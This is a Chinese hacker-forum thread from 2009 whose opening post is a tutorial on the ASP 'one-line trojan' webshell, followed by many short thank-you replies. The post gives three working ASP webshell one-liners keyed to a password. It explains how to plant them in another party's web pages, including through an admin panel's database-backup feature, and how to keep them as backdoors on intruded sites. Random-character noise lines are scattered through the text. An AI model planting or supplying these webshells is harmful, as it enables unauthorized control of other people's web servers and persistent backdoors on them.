标题:
[原创教程]
一句话木马的使用方法视频
[打印本页]
作者:
oooooo
时间:
2009-7-3 09:19
标题:
一句话木马的使用方法视频
一句话木马的使用
) g5 {" t; a5 X
* |/ z$ B5 S# R
by:柔肠寸断 790653916
www.3ast.com.cn
不免费收点徒弟~~~
& K. c9 {% O9 P; d. o+ |+ ^
$ C- S! b; B% h1 r% C# E
5 J8 g7 T! n' J6 Z/ \) K
1、咱们先弄懂怎么使用的。
% w. F' |2 ?; \$ T; R, P6 h
' k* x6 n! M7 \; t9 c
分为客户端和服务端
/ I0 i1 a0 y+ U+ q3 ?
$ Z6 r( O: b5 E, S7 O8 ]
% d) W. {3 ?# U
客户端是连接上去的程序,也可以是网页
# Z$ T. a# H0 }
: `5 P& J7 L$ T. U# I% K
http://www.3ast.com.cn/tool/yijuhua.html
, m$ | ]6 d1 I2 C
* B0 M1 }. Q/ E8 R
服务端就是一段代码,代码里有对应的“密码”
, L9 L% s1 i; W8 Q" L% @' h: |
$ h, Z: X" c6 A( f9 ~9 K% z" U$ k
提供三个服务端:
8 U) l" D* ?& Z: C4 M2 |! f
1. <%eval request("cnnsc")%>
' V. \' Q" E- O, E' v
2. <%execute request("cnnsc")%>
7 l& w) f8 T' a* t
3. <%execute(request("cnnsc"))%>
9 g# e: m8 ?% A; e
( `& p" U+ A- O# l, P* g
cnnsc--密码
. y2 i# s7 n! A- g! q& x8 w0 @2 t
4 I& s/ K$ T8 V5 ~4 v* B' L
我们只要把这个代码插入到对方网站的网页中就可以了
! v% W- Q- K$ h: P" O8 _
: j' u7 J0 l; Y: L7 ^1 q
我演示下,用已经有的一个webshell添加一个asp文件,加上 <%eval request("cnnsc")%>
$ x9 M9 Z6 N" k4 v$ k
" s, E6 S* B) H9 c
换一个页面,添加过了。访问的时候一切正常,看链接
" A4 X4 a7 \2 A/ A, {
! i ^% H% x, d( }' v& d$ h5 }
上传之后
, s; T4 W4 ^7 T. V
: T: W- X t: e( g
链接上去了
8 B8 i) M5 w. i8 Y% c
OK.这个就是链接的主要过程
- g% R$ ?* {2 J3 f+ ^4 K" N
! B) T* u$ E7 x# y, J
( B z$ {/ W" t
+ Z2 X7 s# l f$ i& Q: n
1 O* n$ V$ q) D" ~) L9 a
2、然后懂得哪里会用上、怎么用
+ ?4 I2 m0 f! M2 ]+ U
j: y; E1 Y7 j5 n/ N6 v( l* ~ d
(1)有的时候我们进入了XXX的后台,后台有备份数据库,那么我们就可以在系统中插入这个一句话代码,任意地方,比如皮肤名称啊,文章标题啊,只要是会被写进数据库的就可以了,然后备份数据库成一个asp文件(也有php的一句话),然后链接就可以拿下来了
/ v6 w5 v4 e* x- V& u+ W+ j
" A- \+ Y, G0 G/ O9 g
(2)可以给自己入侵的网站留下后门。。。。
8 W: d& |4 H1 l$ J$ }$ R
; J$ K0 h: R' Q9 ~
(3)我再想想。。。哎,想不出,还是要自己多多实践。。。。
& e. F1 y% ?+ Y* C; l$ S5 n
5 ~, k( \7 m0 @, W$ }) w+ ~
好了,教程到此结束,不懂的可以再来问我。。。790653916
作者:
EndTo偌枫
时间:
2009-7-3 13:27
看看蛤,,
作者:
学徒
时间:
2009-7-3 21:22
我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了我转载了
作者:
学徒
时间:
2009-7-3 21:32
此教程我觉得最重要的应该是那个在后台插入一句话的部分,可是教程中涉及太少,遗憾
作者:
zrz444
时间:
2009-8-3 16:53
学习学习.
作者:
jion
时间:
2009-8-4 02:16
学习学习.
作者:
kwed2345
时间:
2009-9-6 20:26
学习 学习 哈 谢谢分享
作者:
sh89
时间:
2009-12-7 12:51
谢谢分享~
作者:
lusima
时间:
2010-3-21 20:45
收下了 谢谢诶。
作者:
冰吻六秒钟
时间:
2010-3-21 21:14
不会玩啊 先留着吧 呵呵 谢谢啦
作者:
dengwenbo
时间:
2010-3-24 14:45
学习学习``
作者:
521125
时间:
2010-5-8 19:48
学习一下 帮不上你的忙 不好意思
作者:
顾浪
时间:
2010-5-22 13:02
学习下 ,
作者:
topkj
时间:
2010-6-28 21:29
找这个好久了,呵呵,谢谢
作者:
greenrock
时间:
2010-6-30 22:29
ASP的,呵呵
作者:
asas1888
时间:
2010-12-5 19:36
我看看吧111111
作者:
jinfangyuan
时间:
2011-2-14 05:25
学习了~~~~~~~~~~
作者:
冷血泪
时间:
2011-6-18 17:35
看一下啊,先谢谢楼主了
作者:
鱼儿无心
时间:
2011-12-4 16:41
看一下啊,
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2